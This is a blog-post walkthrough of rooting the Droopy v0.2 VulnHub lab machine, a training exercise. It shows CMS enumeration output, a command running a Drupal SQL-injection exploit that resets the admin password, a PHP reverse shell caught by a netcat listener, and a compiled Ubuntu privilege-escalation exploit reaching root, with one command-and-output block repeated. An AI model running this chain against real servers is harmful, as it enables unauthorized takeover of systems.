Friday, 29 April 2016

Walkthrough Droopy v.02

Walkthrough Droopy v.02 :

In this post i shall outline the steps i followed to get root on Droopy hosted at vulnhub . https://www.vulnhub.com/entry/droopy-v02,143/.

From this post onwards i shall try to enlist all the useful links i used to compromise the box for posterity.

Detailed Steps to root :

A nmap scan of the box reveals that only port 80 is open and there seems to be a Drupal 7 website hosted.  After running nikto and dirbuster i decided to run a tool to enumerate CMS's. I know a good one exists for wordpress but surpisingly i could not find much for Drupal. I did come across a tool called CMSMap which according to this github page enumerates wordpress, drupal and joomla . I decided to give this a try to see any information it could reveal. Also i really wanted to be able to learn about Drupal enumeration tools and techniques.

Since the tool is not already built in Kali i decided to follow the github instructions and build it on my box.

./cmsmap.py -t http://192.168.238.132/ -f D -F
[-] Date & Time: 29/04/2016 07:31:43
[-] Target: http://192.168.238.132
[M] Website Not in HTTPS: http://192.168.238.132
[I] Server: Apache/2.4.7 (Ubuntu)
[I] X-Powered-By: PHP/5.5.9-1ubuntu4.5
[L] X-Generator: Drupal 7 (http://drupal.org)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://192.168.238.132/robots.txt
[I] CMS Detection: Drupal
[I] Drupal Version: 7.30
[H] Drupal Vulnerable to SA-CORE-2014-005
[I] Drupal Theme: bartik
[-] Enumerating Drupal Usernames via "Views" Module...
[I] Autocomplete Off Not Found: http://192.168.238.132/?q=user
[-] Drupal Default Files:
[I] http://192.168.238.132/README.txt
[I] http://192.168.238.132/INSTALL.mysql.txt
[I] http://192.168.238.132/MAINTAINERS.txt
[I] http://192.168.238.132/profiles/standard/translations/README.txt
[I] http://192.168.238.132/profiles/minimal/translations/README.txt
[I] http://192.168.238.132/INSTALL.pgsql.txt
[I] http://192.168.238.132/UPGRADE.txt
[I] http://192.168.238.132/CHANGELOG.txt
[I] http://192.168.238.132/INSTALL.sqlite.txt
[I] http://192.168.238.132/LICENSE.txt
[I] http://192.168.238.132/INSTALL.txt
[I] http://192.168.238.132/COPYRIGHT.txt
[I] http://192.168.238.132/web.config
[I] http://192.168.238.132/modules/README.txt
[I] http://192.168.238.132/modules/simpletest/files/README.txt
[I] http://192.168.238.132/modules/simpletest/files/javascript-1.txt
[I] http://192.168.238.132/modules/simpletest/files/php-1.txt
[I] http://192.168.238.132/modules/simpletest/files/sql-1.txt
[I] http://192.168.238.132/modules/simpletest/files/html-1.txt
[I] http://192.168.238.132/modules/simpletest/tests/common_test_info.txt
[I] http://192.168.238.132/modules/filter/tests/filter.url-output.txt
[I] http://192.168.238.132/modules/filter/tests/filter.url-input.txt
[I] http://192.168.238.132/modules/search/tests/UnicodeTest.txt
[I] http://192.168.238.132/themes/README.txt
[I] http://192.168.238.132/themes/stark/README.txt
[I] http://192.168.238.132/sites/README.txt
[I] http://192.168.238.132/sites/all/modules/README.txt
[I] http://192.168.238.132/sites/all/themes/README.txt
[I] http://192.168.238.132/modules/simpletest/files/html-2.html
[I] http://192.168.238.132/modules/color/preview.html
[I] http://192.168.238.132/themes/bartik/color/preview.html
[-] Interesting Directories/Files ...
[L] http://192.168.238.132/info.php
[L] http://192.168.238.132/install.php
[I] Forgotten Password Allows Username Enumeration: http://192.168.238.132/?q=user/password
[-] Search Drupal Modules ...
[I] comment
[I] content
[I] field
[I] node
[I] search
[I] system
[I] user
[I] aggregator
[I] block
[I] blog
[I] book
[I] color
[I] comment
[I] contact
[I] contextual
[I] dashboard
[I] dblog
[I] field
[I] field_ui
[I] file
[I] filter
[I] forum
[I] help
[I] image
[I] locale
[I] menu
[I] node
[I] openid
[I] overlay
[I] path
[I] php
[I] poll
[I] profile
[I] rdf
[I] search
[I] shortcut
[I] simpletest
[I] statistics
[I] syslog
[I] system
[I] taxonomy
[I] toolbar
[I] tracker
[I] translation
[I] trigger
[I] update
[I] user
[I] Checking for Directory Listing Enabled ...
[L] http://192.168.238.132/includes/
[L] http://192.168.238.132/misc/
[L] http://192.168.238.132/modules/
[L] http://192.168.238.132/profiles/
[L] http://192.168.238.132/scripts/
[L] http://192.168.238.132/sites/
[L] http://192.168.238.132/includes/
[L] http://192.168.238.132/themes/
[L] http://192.168.238.132/modules/comment
[L] http://192.168.238.132/modules/field
[L] http://192.168.238.132/modules/node
[L] http://192.168.238.132/modules/search
[L] http://192.168.238.132/modules/system
[L] http://192.168.238.132/modules/user
[L] http://192.168.238.132/modules/aggregator
[L] http://192.168.238.132/modules/block
[L] http://192.168.238.132/modules/blog
[L] http://192.168.238.132/modules/book
[L] http://192.168.238.132/modules/color
[L] http://192.168.238.132/modules/comment
[L] http://192.168.238.132/modules/contact
[L] http://192.168.238.132/modules/contextual
[L] http://192.168.238.132/modules/dashboard
[L] http://192.168.238.132/modules/dblog
[L] http://192.168.238.132/modules/field
[L] http://192.168.238.132/modules/field_ui
[L] http://192.168.238.132/modules/file
[L] http://192.168.238.132/modules/filter
[L] http://192.168.238.132/modules/forum
[L] http://192.168.238.132/modules/help
[L] http://192.168.238.132/modules/image
[L] http://192.168.238.132/modules/locale
[L] http://192.168.238.132/modules/menu
[L] http://192.168.238.132/modules/node
[L] http://192.168.238.132/modules/openid
[L] http://192.168.238.132/modules/overlay
[L] http://192.168.238.132/modules/path
[L] http://192.168.238.132/modules/php
[L] http://192.168.238.132/modules/poll
[L] http://192.168.238.132/modules/profile
[L] http://192.168.238.132/modules/rdf
[L] http://192.168.238.132/modules/search
[L] http://192.168.238.132/modules/shortcut
[L] http://192.168.238.132/modules/simpletest
[L] http://192.168.238.132/modules/statistics
[L] http://192.168.238.132/modules/syslog
[L] http://192.168.238.132/modules/system
[L] http://192.168.238.132/modules/taxonomy
[L] http://192.168.238.132/modules/toolbar
[L] http://192.168.238.132/modules/tracker
[L] http://192.168.238.132/modules/translation
[L] http://192.168.238.132/modules/trigger
[L] http://192.168.238.132/modules/update
[L] http://192.168.238.132/modules/user
[-] Date & Time: 29/04/2016 07:37:02
[-] Completed in: 0:05:19
view raw gistfile1.txt hosted with ❤ by GitHub


The tool was quite good at enumerating the Drupal website and immediately tells us that the site is outdated and suffers from a known vulnerability "Drupal Vulnerable to SA-CORE-2014-005".

Seems like there exists a possibility of launching SQL injection attacks against the box. I decided to use an existing exploit against the box. The exploit https://www.exploit-db.com/exploits/34984/ helps to change the admin credentials on the backend site.

python drupal_exploit.py http://192.168.238.132/ admin hello
host username password
http://nope.io admin wowsecure
Success!
Login now with user:admin and pass:hello
view raw gistfile1.txt hosted with ❤ by GitHub


The exploit worked and now we have changed the admin credentials on the box. We now login to the box with credentials "admin:hello".

Once we are able to login to the box we are able to create additional posts/pages. Checking under the "Modules" tab i see that there is a plugin called "phpfilter" which can be enabled to allow php content to be executed on the webpage. This opens the possibility of executing some php reverse shell code by creating a webpage and executing the same via the webserver. Hence we try this approach. I use standard reverse shell from pentest monkey.

nc -lvnp 4545
listening on [any] 4545 ...
connect to [192.168.238.133] from (UNKNOWN) [192.168.238.132] 51139
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
09:46:02 up 1:33, 0 users, load average: 0.05, 0.03, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ hostname
droopy
$ cat /etc/issue
Ubuntu 14.04.1 LTS \n \l
$ arch
x86_64
view raw gistfile1.txt hosted with ❤ by GitHub



Once we get a reverse shell we see that the box is a 64bit ubuntu 14.04 box which is known to be vulnerable to local priv escaltion exploit https://www.exploit-db.com/exploits/37292/ We compile and run the exploit to get root on the box .

$ gcc ubuntu_ex.c -o ub
gcc ubuntu_ex.c -o ub
$ ./ub
./ub
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
view raw gistfile1.txt hosted with ❤ by GitHub

$ gcc ubuntu_ex.c -o ub
gcc ubuntu_ex.c -o ub
$ ./ub
./ub
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
view raw gistfile1.txt hosted with ❤ by GitHub
Also for completeness I must admit I could have also used a Metasploit module to get a shell but i wanted to avoid using metasploit as much as possible :0

Final Verdict :

Overall it was relatively easy box to pawn but fun nevertheless. Thanks for the creator to take time to create one . Keep up the good work "knightmare" .

Useful Links :

https://github.com/Dionach/CMSmap
https://www.drupal.org/SA-CORE-2014-005
https://www.exploit-db.com/exploits/37292/
https://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)